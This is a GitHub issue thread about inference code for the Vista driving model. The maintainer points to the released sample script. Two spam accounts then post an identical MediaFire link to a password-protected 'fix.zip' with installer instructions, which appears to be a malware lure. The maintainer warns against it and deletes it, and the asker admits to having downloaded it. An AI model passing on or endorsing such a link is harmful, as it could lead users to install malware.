### ISSUE TITLE
any plan to release inference code ?

### ISSUE THREAD

**Issue by WuZhongQing** [OpenDriveLab/Vista#27]
Hi , thanks for your open source, and this is a wonderful work. But i just want to quick start to inference, do you have any plan to release the inference code ?

**Comment by Little-Podi** [comment]
Thanks for your interest! We have released the complete inference code [here](https://github.com/OpenDriveLab/Vista/blob/main/sample.py). Please [install the environment](https://github.com/OpenDriveLab/Vista/blob/main/docs/INSTALL.md) and [customize the sampling](https://github.com/OpenDriveLab/Vista/blob/main/docs/SAMPLING.md) following our documents. Feel free to ask if you encounter any questions.

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WuZhongQing** [comment]
> ask

thanks a lot!

**Comment by WuZhongQing** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

thank you for your help, but i cannot open those file in windows system

**Comment by Little-Podi** [comment]
Please don't open these links. I don't know why these spam appeared under this issue. I have deleted them.
![img_v3_02e4_4da2f1eb-0b10-4b5b-96cc-bff6ced5cc5g](https://github.com/user-attachments/assets/961b8d2f-0dfe-48eb-9462-e93c10d71a53)

**Comment by WuZhongQing** [comment]
> Please don't open these links. I don't know why these spam appeared under this issue. I have deleted them. ![img_v3_02e4_4da2f1eb-0b10-4b5b-96cc-bff6ced5cc5g](https://private-user-images.githubusercontent.com/96873712/361388398-961b8d2f-0dfe-48eb-9462-e93c10d71a53.jpg?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ2NjYxMzgsIm5iZiI6MTcyNDY2NTgzOCwicGF0aCI6Ii85Njg3MzcxMi8zNjEzODgzOTgtOTYxYjhkMmYtMGRmZS00OGViLTk0NjItZTkzYzEwZDcxYTUzLmpwZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjYlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI2VDA5NTAzOFomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPWFjZWZhNzdlNzhlYjUyN2ViNTFiNDY2OWU1NzRkYmQ4ZTFiZjFhZTkxMjk5M2NhNzZmODAwNjU1YmQyODUxODEmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.gaKtcm-Mt7Uj4K8XclTNtkU10VZcy7u1HMi-umb4GWs)

oh,thanks, but i download that immediately >_<. hope nothing will happen.
